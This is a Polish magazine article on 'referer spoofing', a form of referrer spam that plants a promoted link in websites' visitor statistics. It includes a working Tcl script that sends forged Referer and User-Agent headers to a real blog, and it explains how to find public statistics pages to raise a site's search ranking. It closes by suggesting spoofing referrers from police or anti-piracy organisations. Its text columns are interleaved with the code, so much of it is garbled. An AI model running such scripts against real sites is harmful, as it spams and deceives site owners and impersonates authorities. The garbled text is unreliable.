Bezpieczeństwo
Ataki typu referer spoofing
Ataki typu
referer spoofing
Paweł Szcześniak
Współczesny Internet niesie za sobą możliwość skutecznej reklamy. Główną siłą napędową reklamy w
Internecie jest bez wątpienia protokół HTTP który tworzy powszechnie dziś znana technologia WWW.
eklama w Internecie to nie zawsze działalność " OPTIONS,
prowadzona zgodnie z etyką czy nawet z obo- " CONNECT,
wiązującym prawem. W niniejszym artykule " TRACE.
Rchciałbym przedstawić ataki typu referer spo-
ofing i ich zastosowanie w nieetycznym pozycjonowaniu Jednak nas interesuje tylko jedna metoda żądania: GET.
stron internetowych. Żądanie GET służy do pobrania wskazanego przez
klienta zasobu sieci. Przykładowe wywołanie w Li-
Protokół HTTP stingu 1.
By przedstawić czym jest referer spoofing, należy najpierw Powyższe wywołanie to żądanie wysłania przez serwer
poznać podstawy protokołu HTTP. strona.com pliku o nazwie index.html.
Protokół HTTP został opracowany w roku 1989 przez Serwer będzie traktował nas jako przeglądarkę
Sir Tim Berners-Lee w CERT. Pierwszą oficjalną specyfika- Opera, zaś link dzięki, któremu kliknęliśmy by wejść
cję protokołu HTTP możemy odnalezć w dokumencie RFC na strona.com znajduje się pod adresem: strona.biz.pk/
nr. 1945 z roku 1996. linki.html
Istnieje osiem podstawowych metod żądań tego pro-
tokołu: Listing 1. Metoda żądania GET
GET /index.html HTTP/1.1
" GET, HOST: strona.com
" HEAD, User-Agent: "Opera/9.10 (X11; Linux i686; U;
" PUT, en)"
" POST, Referer: strona.biz.pk/linki.html
" DELETE,
70 kwiecień 2008
linux@softwarae.com.pl
Bezpieczeństwo
Ataki typu referer spoofing
Dla referer spoofing istotne jest bliższe
Listing 2. Implementacja w języku TCL (dostępny na http://www.tcl.tk)
poznanie opcjonalnych parametrów wchodzą-
#!/usr/bin/env tclsh cych w skład przykładowych metod żądania.
# Istniejący adres serwera (w formie quasi DNS) Nas interesują tylko dwa:
set target "refspoof.blox.pl"
" Referer pozwala na zdefiniowanie stro-
# Istniejący adres dokumentu http który zamierzamy atakować ny z której przychodzimy (np. poprzez
set target_url "http://refspoof.blox.pl/html" kliknięcie linka z reklamą)
" User-Agent: nazwa klienta dzięki które-
# Fałszywy referer. mu łączymy sie z daną stroną (np. prze-
set fake_referer "http://tajemnicza-kraina.gov.pl/" glądarka internetowa).
# Fałszywy User-Agent string. Podszywamy się pod przeglądarke. Czym jest ten referer spoofing
set ua "Opera/9.10 (X11; Linux i686; U; en)" Mając już wiedzę o tym, jak mniej więcej
funkcjonuje żądanie GET, możemy wreszcie
# Liczba fałszywych żądań wysłanych do serwera dowiedzieć się czym jest ten rodzaj ataku.
set imax 7 Referer spoofing jest techniką polega-
# Port na którym działa atakowany serwer http. Domyślnie 80. jącą na sfałszowaniu sekcji referer w żąda-
set port 80 niu GET.
set i 0 Dzięki temu możemy wykazać, iż nasze
puts "Atakowanie adresu: $target udając: $fake_referer" połączanie pochodzi z wybranej przez nas wi-
while {$i < $imax} { tryny np. ze strony która chcemy zarekla-
incr i mować.
set connection [socket $target $port] Atak tego typu jest niczym innym, jak
puts $connection "GET $target_url HTTP/1.0" sfalcowanym odpowiednikiem poniższej
puts $connection "Connection: Keep-Alive" sytuacji: Na stronie A znajdujemy link do
puts $connection "User-Agent: $ua" strony B. Klikając na powyższy link, w lo-
puts $connection "Referer: $fake_referer\n\n" gach serwera B dowiemy się, iż dzięki na-
puts $connection "\n\n" główkowi referer klikniecie na link doszło
puts $connection "\n\n" na stronie A.
flush $connection Fałszując sekcję referer możemy nie tylko
close $connection wskazać, iż referer pochodził z DOWOLNEJ
puts $i strony, lecz co więcej, ta strona (i link) nie mu-
after 1000 szą nawet istnieć.
}
puts "Zakonczono" Przykładowa implemetacja
ataku typu referer-spoofing
W przykładzie powyżej zastosowaliśmy atak
referer spoofing w celu promocji fikcyjnej
witryny http://tajemnicza-kraina.gov.pl/ w
popularnym systemie blogowym blox.pl. W
ten sposób każdy, kto sprawdza statystyki
odwiedzin swojego bloga, może przy okazji
poznać naszą stronę. Poniższy zrzut ekranu
Listing. 3. Wywołanie programu
$tclsh8.4 refspoof.tcl
Atakowanie adresu: refspoof.blox.pl
udając: http://tajemnicza-
kraina.gov.pl/
1
2
3
4
5
6
7
Zakonczono
Rysunek 1. Screen pokazujący pracę skryptu
www.lpmagazine.org 71
Bezpieczeństwo
Ataki typu referer spoofing
prezentuje efekt tego ataku. Oczywiście jest tworzonej przez popularną aplikację Weba- Czy istnieje
to dość ograniczona forma reklamy, gdyż jej lizer. Grafika numer 3 przedstawia przykła- jakaś forma obrony ?
jedynym odbiorcą jest właściciel strony kon- dowy efekt ataku na tego typu stronę (nie Niestety nie istnieje jakaś uniwersalna for-
trolujący na bieżąco logi odwiedzin. jest to dzieło autora). ma obrony przed atakami referer-spoofing ,
Pojawienie się naszego linku na podob- gdyż wykorzystuje on fundamenty protoko-
Szerszy zasięg reklamy nych stronach, pozwala na bardzo szybkie łu HTTP, którego nie można obejść nie ła-
Naszym celem jest oczywiście szersze gro- zindeksowanie jej przez wyszukiwarki inter- miąc przy okazji standardów tego protoko-
no odbiorców, a to można uzyskać poprzez netowe i podwyższenie pozycji naszej stro- łu zdefiniowanego w dokumentach RFC.
skierowane naszych ataków na upublicznio- ny w wynikach wyszukiwań. Jest to popular- Najprostszą formą obrony jest po pro-
ne w sieci statystyki odwiedzin danych stron na metoda stosowana przez spamerów z całe- stu nieudostępnianie publicznie szczegóło-
internetowych. go świata. wych statystyk dotyczących wejść na na-
By odnalezć tego typu strony wystarczy Należy jasno zaznaczyć, iż tego ty- szą stronę.
wpisać w google: Usage Statistics for. Po- pu działania są prawdopodobnie niezgod- Inną formą obrony jest logowanie adre-
zwoli nam to na odnalezienie strony, z au- ne z prawem, i nie należy ich stosować w sów IP atakującego i blokowanie go przy po-
tomatycznie generowanymi statystykami, praktyce. mocy regułek naszej ściany ogniowej(firewal-
la). Jednak budowanie tego typu regułek zna-
cząco wybiega ponad tematykę prezentowa-
nego artykułu.
Podsumowanie
Ataki typu referer spoofing są ciekawą i
stosunkowo rzadko omawianą techniką po-
zwalającą na pozycjonowanie stron w in-
ternecie. Spowodowane jest to zapewne
faktem, iż tego typu atak jest niczym in-
nym jak formą fałszerstwa i reklama, przy
pomocy tej techniki jest nie tylko wątpliwa
moralnie ale i prawdopodobnie niezgodna z
obowiązującym prawem.
Z drugiej strony ataki tego typu nie są
zbyt dotkliwe dla właściciela strony na któ-
rej zamierzamy się reklamować, wszakże
wysyłając nasze żądanie fałszujemy jedy-
nie adres pochodzenia naszego kliknięcia
po czym zrywamy połączenie nie pobiera-
jąć żadnych plików z serwera. Dzięki temu
potencjalna ofiara nie ponosi kosztów zwią-
Rysunek 2. Nasze sfałszowane statystyki odwiedzin na blogu
zanych z np. ograniczeniem przepustowo-
ści łącza.
W praktyce warto więc ograniczyć się do
atakowania stron znajomych, podszywając się
pod np. organizacje walczące z piractwem czy
policję.
O autorze
Paweł Szcześniak Pasjonat systemów
Unix-like z Gdańska. Zainteresowany w
szczególności szeroko pojętym bezpie-
czeństwem komputerowym oraz tworze-
niem użytecznych aplikacji do tego celu.
W chwilach wolnych tworzy i testuje giełdo-
we systemy transakcyjne dla rynku Forex
oraz kontraktów terminowych.
Kontakt z autorem: pawelsz@sdf.lone-
star.org
Rysunek 3. Przykład wykorzystania ataku referer spoofing na upublicznione statystyki strony
72 kwiecień 2008
Wyszukiwarka
Podobne podstrony:
Bezpieczeństwo Ataki typu DoS Anatomia zagrożenia i metody obrony 02 20052008 04 07 14h23m 01 199(12384021159182)ŚK 2008 04 Jak zacząć budowę makiety modułowej 12008 04 Attic Tv Building Your Own Video Server2008 04 KDE 4 0 Czy warto [Poczatkujacy]2008 04 06 3000 142008 04 Sunshine2008 04 Użytkownik kontra wirusy2008 04 Choose the Right Router [Consumer test]2007 04 Analiza ryzyka – Zarządza nie Bezpieczeństwem Informacji2008 04 XUL – część III [Programowanie]2008 04 The Watcher Monitoring Remote Servers with Ipmi2007 04 Qmail – nowoczesny serwer pocztowy [Bezpieczenstwo]2008 07 08?zpieczeństwo sieci Wi Fi [Bezpieczenstwo]więcej podobnych podstron